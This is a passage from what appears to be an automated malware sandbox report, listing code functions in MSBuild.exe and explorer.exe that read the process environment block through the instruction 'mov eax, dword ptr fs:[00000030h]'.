          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01623540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01653D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01678D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0162A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01658DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01626CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01678CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01678F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01678ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]
